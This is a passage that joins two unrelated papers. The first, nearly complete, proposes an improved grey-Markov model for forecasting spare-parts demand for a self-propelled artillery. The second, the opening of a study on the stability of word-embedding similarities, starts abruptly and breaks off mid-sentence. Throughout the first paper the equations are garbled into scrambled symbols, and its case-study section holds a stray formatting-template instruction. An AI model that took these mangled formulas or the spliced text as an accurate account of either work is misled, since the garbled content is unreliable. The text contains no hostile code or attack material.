Some spare parts consume a large amount, while some spare parts consume a small amount, and have not even been consumed in a few years. This greatly increases the difficulty of accurately predicting the consumption of spare parts. In fact, in addition to conventional methods for forecasting spare parts, it is more important to study forecasting methods for uncertain or intermittent demand. Spare parts demand forecasting is a very important part of equipment management, and it is the basis of inventory management. Accurately planning the supply of spare parts can reduce the huge budget spent on spare parts, supply the required spare parts in time, improve the availability of equipment and the completeness of weapons and equipment, ensure that the equipment can complete production tasks and normal operations on time, and guarantee weapons and equipment In military exercises and battles, fighters will not be missed. On the other hand, accurate demand forecasting will have a very important impact on the formulation of spare parts inventory strategies and the construction of inventory models [5]. In many complex equipment companies, spare parts inventory management has not attracted enough attention. In general: On the one hand, there are generally backward spare parts inventory management methods, improper inventory management methods, difficult spare parts search, and excessive backlog of a large number of unimportant spare parts, resulting in high inventory costs of enterprises; on the other hand, some spare parts Inventory will not be able to meet equipment maintenance or customer demand changes. The shortage of key spare parts may cause equipment delays in maintenance or even shutdown accidents occasionally. Inventory issues increasingly become a bottleneck restricting the survival and development of complex equipment companies. For companies, the most important issue is how to use inventory management strategy and inventory management system optimization to greatly reduce the amount of inventory funds occupied by spare parts, and then increase Capital turnover and corporate economic benefits. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 49 III. THEORETICAL OVERVIEW OF GREY SYSTEM AND MARKOV CHAIN A. Basic concepts of gray system The naming of the gray system is different from the naming methods of other systems, it is named according to the degree of mastery of the information. The completely unknown information is represented by "black", this system is called the black system, and the information that is clearly grasped is represented by "white", this system is called the white system. According to this law, it is clear that "gray" is in the middle ground, and our grasp of this part of information is in a state of "ambiguity". This system is called the gray system. The most widely used grey system in the field of forecasting is the GM(1,1) model. Due to its small sample data, simple calculation and other advantages, it has been widely used in various fields such as society, economy, ecology, agriculture, etc., especially in the case of small samples, poor information and uncertain systems and lack of data, it has also been successful. Application, which determines that the GM(1,1) model in the gray system occupies an important position in the fields of prediction and decision-making. In order to expand the scope of application and prediction accuracy of the GM(1,1) model, many scholars have done a lot of theoretical research. These studies mainly focus on: processing the original data, constructing the background value in the GM(1,1) model, discussing the method of determining the initial value in the GM(1,1) model, combining the gray system theory and other theoretical models Combine. Among them, there are two types of concepts in optimized combination forecasting. One is a forecasting method that selects appropriate weights for the weighted average of the forecast results obtained from several forecasting methods. The key is to determine the weighting coefficient of each individual forecasting method. Compare in several prediction methods, choose the prediction model with the best fit or the smallest standard deviation as the best model for prediction. Combination forecasting is to play its role when a single forecasting model cannot completely describe the changing law of the forecast. B. Basic principles of the gray system Using the information currently available to explore and predict unknown information is the most important theory of the gray system, which is the process from "grey" to "white" until the research purpose is achieved. The basic principles of the gray system are: 1) Principle of difference information "Difference" is information, and all information must be different. Saying "thing A is different from thing B" means that A has special information that B does not, which is the so-called difference. The basic way people understand the world is to observe the differences of different things in the objective world. 2) The principle of non-uniqueness of solution When the information is not fully grasped, the solution obtained for it is uncertain and non-unique. This is caused by the incompleteness of the gray system information and cannot be avoided. 3) Principle of least information How to use the least information that has been mastered to maximize the effect is an important feature of the gray system to study unknown information. 4) Cognitive basis principle Information is the basis of cognition. All cognition must be based on the information you have. 5) New information priority principle The new information has priority in cognition, and its use value is greater than the old information. 6) The principle of immortality Incomplete information and uncertainty are universal. Information is completely relative and temporary. The completeness of information is specific to a specific environment, and the objective environment is constantly changing, which will also be accompanied by the emergence of new uncertainties. C. Grey prediction model The gray prediction model uses GM (1,1) modeling on the known information to find the simulated value, and then predicts the unknown information. This determines the change range of the gray forecast object, and its range must be bounded and related to time. As the core model of grey prediction, GM(1,1) model is widely used in practical research. The establishment of the model is based on the data in the time series. Through this model, the law of data change is analyzed, and the internal relationship is analyzed from the external relationship of various factors to find the hidden law, thereby generating the corresponding data sequence, and performing differential equation modeling. Forecast the development trend of things. Predicting the gray system is to mine and discover the development laws of the system by processing the International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 50 original data and establishing the gray model, so as to predict the future state of the system. Since the gray system contains both known information and unknown information, its prediction is the prediction of the gray process that is related to time and changes in a certain direction. Although the laws shown by some gray processes are random and disorderly, their essence is bounded, orderly, and potentially regular. There are four main types of gray system forecasts: a) Sequence prediction: refers to the prediction of the behavior of the system variables in the future. After the qualitative analysis of the data series, the appropriate sequence operator is selected, and the gray model is established based on the number sequence after the operation of the operator. The accuracy of the model It can be used to predict after inspection. b) Catastrophe prediction: refers to the prediction of the abnormal value of the gray system, that is, the prediction of the time when a given gray number occurs, so as to provide guidance for the work of relevant departments. c) System prediction: refers to the prediction of multiple variables in the system together, which is mainly used to predict the relationship between system variables and reveal the development and changes of the system. d) Topological prediction: also called waveform prediction. When the original data fluctuates greatly, the gray model is used to predict the waveform of future behavior data. D. Markov process Markov process has great significance in stochastic process and is widely used in biology, physics and other sciences. The definition of Markov chain was first proposed in the early nineteenth century, and then people began to study and explore a random process with no aftereffect. Ineffectiveness means that the state of the future is only related to the present and not related to the past. Markov has made great contributions to probability theory, number theory, and differential equations[6]. During 1906-1912, he proposed and studied Markov chains. His research results are of great help to probability theory. The random process he studied is called Markov process. Markov processes are continuous or discrete according to their state and time parameters, and are divided into three categories 1) Time and state are both discrete Markov processes, called Markov chains. 2) The Markov process with continuous time and discrete state is called continuous-time Markov chain. 3) Time and state are continuous, which is called Markov process. The research object of Markov model is mainly the state of the system and the transition between states. The main purpose of establishing Markov model for calculation analysis is to predict the possible state of variables in the future by analyzing the current state and change trend of system variables, and then provide corresponding theoretical basis for decision-making. The steps of using Markov process to predict include: Step1 Reasonably divide the state. When the sample has less data, the number of states should be as small as possible, so that each state contains more data, which can more objectively reflect the transfer law between each state; Step2 Calculate the transition probability between each state in the Markov process of the system, and determine the corresponding state transition matrix; Step3 According to the initial state of the system and the transition probability matrix to predict the state in the future. IV. IMPROVED GRAY MARKOV MODEL A. Gray model Grey system theory was first proposed by our famous scholar Professor Deng Julong in 1982. It is a theory of gray system modeling, prediction, analysis, control and decision-making. Grey prediction method is a new type of nonlinear prediction technology in the late 1990s, which is a method system based on sequence operators and gray sequence production. The gray prediction model uses accumulation, accumulation or step ratio generation techniques, and uses differential fitting to directly convert the time series into a first-order univariate constant coefficient differential equation. According to the principle of continuity of prediction, the gray theory can be used to get more Accurate prediction results [7]. For data with relatively short data series, less information, and less regularity, data that meets the characteristics of poor information systems, the gray model can show superiority and advanced. The gray model is usually divided into a first-order single-variable model and a first-order Combined model. The model is used in this paper. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 51 1) The original data sequence required for the design of spare parts for weapons and equipment is: )}(,),2(),1({ )0()0()0()0( nXXXX  (1) among them: 。nkkx ,,2,1,0)()0(  2) Accumulate the original sequence once:  )(,),2(),1( )1()1()1()1( nxxxX  (2) among them: ),2,1)(()( 1 )0()1( nkixkx k i    3) Generate a sequence of immediate means:  )(,),3(),2( )1()1()1()1( nzzzZ  (3) among them:  )1()( 2 1 )( )1()1()1(  kxkxkz 4) Establish model whitening equation: baz dx dz  )1( )1( (4) Among them:a and b are undetermined parameters. 5) The gray equation of the model is: bkazkx  )()( )1()1( (5) 6) The corresponding time response equation is: a b e a b xkx at         )1()1( )0()1( (6) 7) The least square estimates of parameters a and b are:   YBBB b a A TT 1        (7)                   1)( 1 1)3( 1)2( )1( )1( )1( nz z z B                 )( )3( )2( )0( )0( )0( nx x x Y  8) Reducing the prediction results to the prediction sequence: )()1()1( )1()1()0( kxkxkx   (8) among them: 1,,2,1  nk  It can be seen from the above that the model predicts the original sequence after one accumulation. Because the one-time accumulation sequence is monotonic, the model is suitable for predicting the data of the exponential change law, and the prediction error is large for random volatility data. The GM(1,1) forecasting model occupies an important position in the grey system theory. The starting point of the model research is to explore valuable information in its own time series and explore the law of the research content without considering the impact of the research content. The gray system prediction model takes a small amount of data information as the research object. Its research characteristics are simple calculation, simple principle and high prediction accuracy. The model has good prediction accuracy for modeling small amounts of information, but the prediction accuracy for irregularly changed and fluctuating data will be greatly reduced, so the gray prediction model does not have high prediction results for any data. The Markov chain prediction model is different from the gray system model. It makes up for the shortcomings of the gray prediction model and can study data with large volatility. Its model requires the prediction object to have Markov properties. In this chapter, the two models are reasonably combined to form a gray Markov prediction model. The GM(1,1) model is used to characterize the trend of the original data sequence, and the Markov prediction model is applied to the simulated data obtained by the GM(1,1) model. The length of the ruler is selected and the shortness of the inch is compensated to improve the accuracy. B. Grey Markov model According to the gray system theory, the gray mean model and the Markov model are fused, and the gray Markov model is used to predict the demand for International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 52 weapon equipment and spare parts. Specifically, the gray mean model is used to predict the future demand for weapon equipment and spare parts [8]. The state transition matrix determines the possible state of future spare parts, and finally corrects the prediction result based on the ratio between the predicted value and the actual value, so as to realize accurate prediction of weapon equipment spare parts. After determining the state division and state transition matrix, the general gray Markov model uses the maximum value of the current transition probability as the next transition value [9]~[11]. This method ignores the possibility of other transition probabilities and based on the last state. For prediction, it is easy to be affected by randomness, which makes the prediction accuracy low, so the gray Markov model is improved. The modeling idea of the gray-Markov combination model is to first establish a gray prediction model to obtain a prediction sequence, and then use the relative difference sequence of the prediction sequence and the actual sequence to divide the state space, find the interval of the predicted value, and follow the prediction [12]. The interval modifies the results of the model prediction, increases the credibility of the prediction, calculates the transition probability matrix from the point where the original data sequence falls into each state, and estimates the future change trend based on the state transition probability matrix. Calculate the state transition probability matrix and obtain the predicted value according to the gray model ),2,1)(( )0( nkkx   .Using the curve as a reference, it is divided into several bar regions parallel to the trend curve, and each region constitutes a state. In this way, a non-stationary random sequence that matches the characteristic points of the Markov chain is divided into n states. Any state is  iii 21 , (9) among them: ii Akx   )( )0( 1 , ii Bkx   )( )0( 2 The state transition probability is: ni M M kp i kij ij ,2,1,)( )(  (10) In the formula: )(kM ij is the number of original data that state i  transfers to state l after j  steps; i M is the number of original data in state i  . The specific steps based on the improved gray Markov prediction model are: Step1: According to the original data )(kx , find the coefficient a、b in the gray model, and get the fitting value )( ^ kx corresponding to the actual data. Step2: The range of the relative residual value sequence is obtained from the relative residual value formula. Step3: According to the actual situation, use the residual formula to divide the relative residual value range into states: L  , 21 、 Step4: Based on the improved Markov chain state transition probability determination method, the one- step state transition probability matrix is calculated:                  LLLL L L ppp ppp ppp P     21 22221 11211 (11) among them: 1,0 1    L j ijij pp Suppose a prediction system has 4321  、、、 four states, the last data in actual data )(kx is in state 4 , then the initial distribution is )1000( )0( I , and the predicted value of the next data is PII  )0()1( , based on which the state interval in which the predicted data is located can be obtained. The gray Markov model is a model that combines the gray model and the Markov model. Its prediction process is: firstly generate gray according to the original data sequence, determine the parameters of the gray model according to the generated sequence; then use the established gray model Carry out simulation prediction, test the accuracy of the established model according to the predicted value and actual value; then appropriately divide the gray prediction result into International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 53 several states, establish a Markov model, and predict and modify the state of the gray prediction result. According to the combination of gray model and Markov model, traditional gray Markov model prediction methods mainly include the following two: Use the Markov process to predict the sign of the gray prediction result residual model. After processing the given time series, a gray model is established, and the residual data series can be obtained by comparing the predicted result of the gray model with the actual value. The absolute value of the residual data sequence is used as the original data, and the gray prediction is performed to obtain the gray residual model. In order to improve the prediction accuracy, the Markov process is used to predict the sign of the residual model at the future time. Use Markov process to predict the relative error of gray prediction results. Establish a gray model based on the original data series, divide the state of the relative error of the gray prediction result, and predict the state of the relative error of the gray prediction result at the future time according to the current state transition, thereby improving the accuracy of the gray prediction result Sex. The essence of the first combination forecasting method is to correct the gray residual model to improve the accuracy of the forecast; the essence of the second combination forecasting method is to directly correct the gray forecast results, so it is better than the first combination forecasting method. The calculation process is simple. When the Markov process is used to predict the relative error of the gray results, there are two ways: one is to directly predict the state of the system in the future based on the initial state of the system and the n- step state transition matrix; the other is It is based on the initial state of the system and the one-step state transition matrix to predict the state of the next moment, and then based on the state of the next moment and the one-step state transition matrix to predict the state of the system at a later time. The advantage of the first method is that when predicting the state of the system at any time, the initial state used is known and accurate, and the various states of the system at a certain time are considered, and The probability of overestimation and underestimation is small; the disadvantage is: when predicting the state of the system at a distant time, a multi-step state transition matrix is needed. The calculation process of the multi-step state transition matrix is more complicated, and when the number of steps is large The accuracy of the corresponding matrix cannot be guaranteed. The advantage of the second method is that only one step of the state transition matrix is required for Markov prediction, the calculation process is simple, and when the predicted state is accurate, the prediction result is very ideal; the disadvantage is: when the state of the system at a certain moment When the forecast is inaccurate, the forecast result will have a big deviation, and it will affect the forecast accuracy at subsequent moments. In the following articles, the model corresponding to the first calculation method is called the first gray Markov model, and the model corresponding to the second calculation method is called the second gray Markov model. The improved gray Markov model is a reasonable combination of the first and second gray Markov models, that is, two calculation methods are used to predict the corresponding values of the system parameters at the future time, and then the two results are calculated. Calculate the average value. The improved gray Markov model is optimized for Markov process prediction, so the gray modeling part and The GM(1,1) model is consistent, but the difference is the correction effect of the Markov process on the gray prediction results. The specific steps for the establishment of the improved gray Markov model mainly include: firstly generate gray for the prediction sequence, obtain the parameters of the gray model according to the generated data sequence, determine the gray model and make predictions; then divide the relative error of the gray prediction results State, determine the state transition of the Markov process; then according to the calculation method of the first gray Markov model and the second gray Markov model to obtain the corresponding correction value of the gray prediction result, so as to obtain the improved gray The predicted value of the Markov model. V. CASE ANALYSIS Finally, complete content and organizational editing before formatting. Please take note of the following items when proofreading spelling and grammar: A. Experiment Verification Taking the consumption of a spare part of a certain type of self-propelled artillery of the Military Machinery Maintenance Institute as an example, Table I. is the historical data of the consumption of a certain spare part during the continuous service of a certain type of self-propelled artillery of 2016~2019 for 3 years, with the serial number of the spare part as the horizontal axis, and the demand for spare parts For the vertical axis, the improved gray Markov model is used to predict the future demand for spare parts. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 54 TABLE I. HISTORICAL DATA OF SPARE PARTS CONSUMPTION OF A CERTAIN EQUIPMENT Serial number 1 2 3 4 5 6 7 8 Number of spare parts 20 14 18 9 10 11 6 5 The following data is used as a sample, and the improved gray-Markov model and other models are used to predict the number of spare parts for the eighth time, and a comparative analysis is made. Using the improved gray-Markov model to predict the demand for spare parts: From the above data can be obtained  5,6,11,10,9,18,14,20)0( X It can be obtained by smoothing the historical data of the demand for spare parts of weapons and equipment }2000.1,8333.1 ,9091.0,9000.0,0000.2,7778.0,4268.1{ X  Therefore, )0( X needs to be exchanged for translation. Take 5.32c , after calculation, we can get  9.37,5.38,5.43,5.42,5.41,5.50,5.46,5.52)0( Y }0267.1,1299.1 ,9770.0,9765.0,2169.1,9208.0,1290.1{ Y  So, the )0( Y sequence can be operated with the gray model, and finally subtract c to obtain )0( X Using Equation 2 to do an accumulation generator for we can get  353,5.315,5.277,5.233,191,5.149,99,5.52)1( Y The sequence is generated by using the immediate mean for ,which can be obtained according to Equation 3. }25.234,25.296 ,25.255,25.212,25.170,25.124,75.75{ )1( Z Establish prediction equations according to formulas 4, 5, and 6 64.126814.1216)( )1(0405412.0 )1(    k eky Find the reduction value according to equations 7 and 8 }8848.37,4522.39,0845.41 ,7844.42,5545.44,398.46,3176.48,5.52{ )0(   Y }3848.5,9522.6,2844.10 ,0545.12,8980.13,8176.15,0000.20{ )0( X Through the prediction of the gray model, you can get the fitted figure of the simulated value and the actual value after data processing as shown in Figure 1. Figure 1. Fitting diagram of simulated value and actual value Obtain the relative residual sequence according to Equation 9 }6955.7,8705.15,9588.21 ,8437.2,9394.33,7892.22,9831.12{ )0(   To divide the state, the upper and lower limits of the state are       )min()max(05.0)max( )min()max(05.0)min( )0()0()0( max )0()0()0( min   The range of the residual error is expanded by 5% above and below, calculated  6256.25,7758.36 The interval between the cells in the state is taken to be equal, and the number of states is sequentially selected from 2 to be calculated. The maximum value is the sequence length. From this, 7 sets of trial calculation results can be obtained. Calculate the one-step state transition probability matrix according to Equation 12 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 55              005.05.0 6751.03249.000 5.0042.008.0 0100 P (1) Use the state transition probability matrix to obtain the prediction results, as shown in Table II TABLE II. FORECAST RESULTS Raw data Model calculation data Raw data Model calculation data 20.0000 20.0000 10.0000 10.5184 14.0000 15.8176 11.0000 10.4467 18.0000 16.9127 6.0000 6.1321 9.0000 10.6324 5.0000 6.5528 Predict three numbers 3.4219 2.4896 1.2732 The state transition probability matrix is used to predict the consumption of spare parts for a certain equipment spare part in the future time period, but its accuracy and accuracy need to be calculated using error analysis formulas, and compared with other gray models or classic gray-Markov models. B. Model comparison Average error calculation： 1 )( 2      n ke E n k (12) First, according to the average error calculation formula, calculate the average error of the model when different states are divided. As shown in Table Ⅲ, it can be seen that when the number of states is 4, the accuracy of the model is the highest. TABLE III. MODEL AVERAGE ERROR UNDER DIFFERENT STATE DIVISION Number of states Model mean error Number of states Model mean error 2 15.9536% 6 Undesirable 3 13.7272% 7 Undesirable 4 11.5191% 8 Undesirable 5 Undesirable — — Second, the classic gray-Markov model is used for prediction, and the prediction accuracy is compared, as listed in Table Ⅳ. TABLE IV. FORECAST ACCURACY OBTAINED BY USING DIFFERENT MODELS GM(1,1)model Number of states Classic model Improve the model 16.8686% 2 15.9536% 15.9536% 3 13.7272% 13.7272% 4 Undesirable 11.5191% 5 Undesirable Undesirable 6 Undesirable Undesirable When the number of state divisions is 2, 3, the accuracy of the improved model is about 1.06 times and 1.23 times higher than that of the model, which is the same as the accuracy of the classic gray Markov prediction model. When the number of state divisions is 4, the accuracy of the improved model is about 1.46 times higher than that of the model, and the classical Markov prediction model cannot achieve the prediction effect because it cannot build a successful Markov chain state transition probability matrix. As the number of state divisions increases, the average accuracy of the improved gray Markov model is on the rise. The improved model supports more number of state divisions, so it is better than the classic gray Markov prediction model. The application environment of the gray prediction method is relatively loose. It does not need to determine whether the data changes follow the same type of distribution. It does not require large sample statistics to make predictions. It has certain application prospects. VI. CONCLUSION In the field of spare parts support for weapons and equipment, forecasting has always been a relatively difficult problem. Due to the time-varying and random characteristics of weapon equipment spare parts demand, this paper proposes to predict the demand of weapon equipment spare parts based on the improved gray-Markov prediction method. By comparing the prediction results, the modified model is superior to the traditional gray model and classic the gray-Markov model has high prediction accuracy and provides a reliable scientific basis for the evaluation of weapon equipment reliability and the maintenance of its equipment. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 56 ACKNOWLEDGMENT This work is supported by the Shanxi Natural Science Basic Research Project (2019JM-603) for its fund support. REFERENCES [1] Shao Yanjun. Research on Preventive Maintenance Strategy of Weapon Equipment Based on Fault Prediction [D]. North University of China, 2013. [2] Yan Xiaoyao, Yan Li. Application of neural network in the forecast of aviation weapon equipment spare parts demand [J]. Today Keyuan, 2008(20): 56-57. [3] Zhou Hao, Huang Shanzhong. Equipment consumption prediction based on GM(1,1) and grey Markov model[J]. Journal of Wuhan University of Technology (Transportation Science and Engineering Edition). 2015, 39(06):1166- 1168+1174. [4] Qiu Chundong, Yang Yuzhi, Wang Chunyun. Prediction of CT tube failure interval based on gray Markov chain model [J]. Modern Instruments and Medical, 2019, 25(06): 86-88+66. [5] Xu Ning, Dang Yaoguo, Ding Song. GM(1,1) model background value optimization method based on error minimization[J]. Control and Decision. 2015,30(02):283-288. [6] Lv Z, Hou H, Yi Z, Singh HP, editors. Grey prediction model application in early warning of ice-coating lines[C]. Recent Developments in Control, Automation and Power Engineering (RDCAPE), 2015 International Conference on; 2015 12-13 March 2015. [7] Ma Liangli, Li Gang, Tao Daoqiang. Fault prediction method based on gray GM(1,1) model[J]. Computer Applications and Software. 2013, 30(04):198-200. [8] Shi Pei, Gao Shan, Su Yanqin. An improved GM(1,1) model used in equipment fault prediction [J]. Computer Measurement and Control. 2012, (05): 1176-1178. [9] Zhang Wenjie, Yuan Hongping. Research on the failure prediction of energy-saving equipment based on grey Markov model[J]. System Science and Mathematics, 2019, 39(01): 65-75. [10] Li Li, Xiong Wei, He Jie, Yuan Xufeng, Zou Xiaosong. Equipment failure rate prediction based on improved grey Markov model [J]. Electric Power Science and Engineering, 2015, 31(08): 20-24. [11] Hong Zhanpeng, Chen Zhenghua. Gray Markov Model for Metro Car Door Failure Prediction [J]. Equipment Manufacturing Technology, 2017(03):223-226. [12] Ma Chunmao, Shao Yanjun, Pan Hongxia, Liu Yongjiang. Research on prediction of equipment failure interval based on gray Markov model [J]. Journal of Ordnance Engineering, 2013, 34(09): 1193-1196. work_zhl5dw75nfhy7oputsllvjjcqq ---- Evaluating the Stability of Embedding-based Word Similarities Maria Antoniak Cornell University maa343@cornell.edu David Mimno Cornell University mimno@cornell.edu Abstract Word embeddings are increasingly being used as a tool to study word associations in specific corpora. However, it is unclear whether such embeddings reflect enduring properties of lan- guage or if they are sensitive to inconsequential variations in the source documents. We find that nearest-neighbor distances are highly sen- sitive to small changes in the training corpus for a variety of algorithms. For all methods, including specific documents in the training set can result in substantial variations. We show that these effects are more prominent for smaller training corpora. We recommend that users never rely on single embedding models for distance calculations, but rather average over multiple bootstrap samples, especially for small corpora. 1 Introduction Word embeddings are a popular technique in natural language processing (NLP) in which the words in a vocabulary are mapped to low-dimensional vectors. Embedding models are easily trained—several imple- mentations are publicly available—and relationships between the embedding vectors, often measured via cosine similarity, can be used to reveal latent seman- tic relationships between pairs of words. Word em- beddings are increasingly being used by researchers in unexpected ways and have become popular in fields such as digital humanities and computational social science (Hamilton et al., 2016; Heuser, 2016; Phillips et al., 2017). Embedding-based analyses of semantic similarity can be a robust and valuable tool, but we find that standard methods dramatically under-represent the variability of these measurements. Embedding algo- rithms are much more sensitive than they appear to factors such as the presence of specific documents, the size of the documents, the size of the corpus, and even seeds for random number generators. If users do not account for this variability, their conclusions are likely to be invalid. Fortunately, we also find that simply averaging over multiple bootstrap samples is sufficient to produce stable, reliable results in all cases tested. NLP research in word embeddings has so far fo- cused on a downstream-centered use case, where the end goal is not the embeddings themselves but performance on a more complicated task. For exam- ple, word embeddings are often used as the bottom layer in neural network architectures for NLP (Ben- gio et al., 2003; Goldberg, 2017). The embeddings’ training corpus, which is selected to be as large as possible, is only of interest insofar as it generalizes to the downstream training corpus. In contrast, other researchers take a corpus- centered approach and use relationships between em- beddings as direct evidence about the language and culture of the authors of a training corpus (Bolukbasi et al., 2016; Hamilton et al., 2016; Heuser, 2016). Embeddings are used as if they were simulations of a survey asking subjects to free-associate words from query terms. Unlike the downstream-centered approach, the corpus-centered approach is based on direct human analysis of nearest neighbors to embed- ding vectors, and the training corpus is not simply an off-the-shelf convenience but rather the central object of study. 107 Transactions of the Association for Computational Linguistics, vol. 6, pp. 107–119, 2018. Action Editor: Ivan Titov. Submission batch: 6/2017; Revision batch: 9/2017; Published 2/2018. c©2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Downstream-centered Corpus-centered Big corpus Small corpus, difficult or impossi- ble to expand Source is not important Source is the object of study Only vectors are important Specific, fine-grained comparisons are important Embeddings are used in downstream tasks Embeddings are used to learn about the mental model of word associa- tion for the authors of the corpus Table 1: Comparison of downstream-centered and corpus- centered approaches to word embeddings. While word embeddings may appear to measure properties of language, they in fact only measure properties of a curated corpus, which could suf- fer from several problems. The training corpus is merely a sample of the authors’ language model (Shazeer et al., 2016). Sources could be missing or over-represented, typos and other lexical variations could be present, and, as noted by Goodfellow et al. (2016), “Many datasets are most naturally arranged in a way where successive examples are highly cor- related.” Furthermore, embeddings can vary consid- erably across random initializations, making lists of “most similar words” unstable. We hypothesize that training on small and poten- tially idiosyncratic corpora can exacerbate these prob- lems and lead to highly variable estimates of word similarity. Such small corpora are common in digital humanities and computational social science, and it is often impossible to mitigate these problems simply by expanding the corpus. For example, we cannot create more 18th Century English books or change their topical focus. We explore causes of this variability, which range from the fundamental stochastic nature of certain al- gorithms to more troubling sensitivities to properties of the corpus, such as the presence or absence of specific documents. We focus on the training cor- pus as a source of variation, viewing it as a fragile artifact curated by often arbitrary decisions. We ex- amine four different algorithms and six datasets, and we manipulate the corpus by shuffling the order of the documents and taking bootstrap samples of the documents. Finally, we examine the effects of these manipulations on the cosine similarities between em- beddings. We find that there is considerable variability in embeddings that may not be obvious to users of these methods. Rankings of most similar words are not reliable, and both ordering and membership in such lists are liable to change significantly. Some uncer- tainty is expected, and there is no clear criterion for “acceptable” levels of variance, but we argue that the amount of variation we observe is sufficient to call the whole method into question. For example, we find cases in which there is zero set overlap in “top 10” lists for the same query word across bootstrap samples. Smaller corpora and larger document sizes increase this variation. Our goal is to provide meth- ods to quantify this variability, and to account for this variability, we recommend that as the size of a corpus gets smaller, cosine similarities should be averaged over many bootstrap samples. 2 Related Work Word embeddings are mappings of words to points in a K-dimensional continuous space, where K is much smaller than the size of the vocabulary. Re- ducing the number of dimensions has two benefits: first, large, sparse vectors are transformed into small, dense vectors; and second, the conflation of features uncovers latent semantic relationships between the words. These semantic relationships are usually mea- sured via cosine similarity, though other metrics such as Euclidean distance and the Dice coefficient are possible (Turney and Pantel, 2010). We focus on four of the most popular training algorithms: La- tent Semantic Analysis (LSA) (Deerwester et al., 1990), Skip-Gram with Negative Sampling (SGNS) (Mikolov et al., 2013), Global Vectors for Word Rep- resentation (GloVe) (Pennington et al., 2014), and Positive Pointwise Mutual Information (PPMI) (Levy and Goldberg, 2014) (see Section 5 for more detailed descriptions of these algorithms). In NLP, word embeddings are often used as fea- tures for downstream tasks. Dependency parsing (Chen and Manning, 2014), named entity recogni- tion (Turian et al., 2010; Cherry and Guo, 2015), and bilingual lexicon induction (Vulic and Moens, 2015) are just a few examples where the use of embeddings as features has increased performance in recent years. Increasingly, word embeddings have been used as evidence in studies of language and culture. For example, Hamilton et al. (2016) train separate em- beddings on temporal segments of a corpus and then 108 analyze changes in the similarity of words to measure semantic shifts, and Heuser (2016) uses embeddings to characterize discourse about virtues in 18th Cen- tury English text. Other studies use cosine similar- ities between embeddings to measure the variation of language across geographical areas (Kulkarni et al., 2016; Phillips et al., 2017) and time (Kim et al., 2014). Each of these studies seeks to reconstruct the mental model of authors based on documents. An example that highlights the contrast between the downstream-centered and corpus-centered per- spectives is the exploration of implicit bias in word embeddings. Researchers have observed that embedding-based word similarities reflect cultural stereotypes, such as associations between occupa- tions and genders (Bolukbasi et al., 2016). From a downstream-centered perspective, these stereotypical associations represent bias that should be filtered out before using the embeddings as features. In contrast, from a corpus-centered perspective, implicit bias in embeddings is not a problem that must be fixed but rather a means of measurement, providing quantita- tive evidence of bias in the training corpus. Embeddings are usually evaluated on direct use cases, such as word similarity and analogy tasks via cosine similarities (Mikolov et al., 2013; Pennington et al., 2014; Levy et al., 2015; Shazeer et al., 2016). Intrinsic evaluations like word similarities measure the interpretability of the embeddings rather than their downstream task performance (Gladkova and Drozd, 2016), but while some research does evaluate embedding vectors on their downstream task perfor- mance (Pennington et al., 2014; Faruqui et al., 2015), the standard benchmarks remain intrinsic. There has been some recent work in evaluating the stability of word embeddings. Levy et al. (2015) focus on the hyperparameter settings for each algo- rithm and show that hyperparameters such as the size of the context window, the number of negative sam- ples, and the level of context distribution smoothing can affect the performance of embeddings on simi- larity and analogy tasks. Hellrich and Hahn (2016) examine the effects of word frequency, word am- biguity, and the number of training epochs on the reliability of embeddings produced by the SGNS and skip-gram hierarchical softmax (SGHS) (a variant of SGNS), striving for reproducibility and recommend- ing against sampling the corpus in order to preserve stability. Likewise, Tian et al. (2016) explore the ro- bustness of SGNS and GloVe embeddings trained on large, generic corpora (Wikipedia and news data) and propose methods to align these embeddings across different iterations. In contrast, our goal is not to produce artificially stable embeddings but to identify the factors that create instability and measure our statistical confi- dence in the cosine similarities between embeddings trained on small, specific corpora. We focus on the corpus as a fragile artifact and source of variation, considering the corpus itself as merely a sample of possible documents produced by the authors. We examine whether the embeddings accurately model those authors, using bootstrap sampling to measure the effects of adding or removing documents from the training corpus. 3 Corpora We collected two sub-corpora from each of three datasets (see Table 2) to explore how word embed- dings are affected by size, vocabulary, and other parameters of the training corpus. In order to bet- ter model realistic examples of corpus-centered re- search, these corpora are deliberately chosen to be publicly available, suggestive of social research ques- tions, varied in corpus parameters (e.g. topic, size, vocabulary), and much smaller than the standard cor- pora typically used in training word embeddings (e.g. Wikipedia, Gigaword). Each dataset was created or- ganically, over specific time periods, in specific social settings, by specific authors. Thus, it is impossible to expand these datasets without compromising this specificity. We process each corpus by lowercasing all text, re- moving words that appear fewer than 20 times in the corpus, and removing all numbers and punctuation. Because our methods rely on bootstrap sampling (see Section 6), which operates by removing or multi- plying the presence of documents, we also remove duplicate documents from each corpus. U.S. Federal Courts of Appeals The U.S. Federal courts of appeals are regional courts that decide ap- peals from the district courts within their federal ju- dicial circuit. We examine the embeddings of the most recent five years of the 4th and 9th circuits.1 1https://www.courtlistener.com/ 109 Corpus Number of documents Unique words Vocabulary density Words per document NYT Sports (2000) 8,786 12,475 0.0020 708 NYT Music (2000) 3,666 9,762 0.0037 715 AskScience 331,635 16,901 0.0012 44 AskHistorians 63,578 9,384 0.0022 66 4th Circuit 5,368 16,639 0.0014 2,281 9th Circuit 9,729 22,146 0.0011 2,108 Table 2: Comparison of the number of documents, number of unique words (after removing words that appear fewer than 20 times), vocabulary density (the ratio of unique words to the total number of words), and the average number of words per document for each corpus. Setting Method Tests... Run 1 Run 2 Run 3 Fixed Documents in consistent order variability due to algorithm (baseline) A B C A B C A B C Shuffled Documents in random order variability due to document order A C B B A C C B A Bootstrap Documents sampled with replacement variability due to document presence B A A C A B B B B Table 3: The three settings that manipulate the document order and presence in each corpus. The 4th circuit contains Washington D.C. and sur- rounding states, while the 9th circuit contains the entirety of the west coast. Social science research questions might involve measuring a widely held belief that certain courts have distinct ideological ten- dencies (Broscheid, 2011). Such bias may result in measurable differences in word association due to framing effects (Card et al., 2015), which could be observable by comparing the words associated with a given query term. We treat each opinion as a single document. New York Times The New York Times (NYT) An- notated Corpus (Sandhaus, 2008) contains newspaper articles tagged with additional metadata reflecting their content and publication context. To constrain the size of the corpora and to enhance their specificity, 